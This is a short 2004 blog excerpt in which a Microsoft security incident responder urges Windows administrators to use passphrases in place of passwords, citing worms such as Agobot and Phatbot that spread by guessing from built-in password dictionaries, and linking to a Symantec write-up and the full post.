Why you shouldn't be using passwords of any kind on your Windows networks . . .
Posted
Wednesday, July 28, 2004 3:17 PM
by
G Andrew Duthie
…use passphrases instead:
So this is my first ever blog entry and seeing as how I'm a senior member of the PSS Security Incident Response team, you may think I've stopped taking my medication by opening with a title like the one above! Medication issues notwithstanding, it's true - you should NOT be using passwords of any kind. Why? For starters, passwords are ridiculously easy to guess or crack. Worms like Agobot / Phatbot / Polybot / SDBot / RBot (no I didn't write this one) all ship with dictionaries of passwords numbering in the hundreds and they can easily replicate to a system that has a password in this word list, and the miscreants are really good at keeping these wordlists up to date with passwords that they've cracked from other systems.
As an example of what I'm talking about check out Symantec's write-up of this little nasty that we encounter on my team just about every day:
http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.gaobot.ae.html
[Robert Hensing]
Read the whole thing at: http://weblogs.asp.net/robert_hensing/archive/2004/07/28/199610.aspx.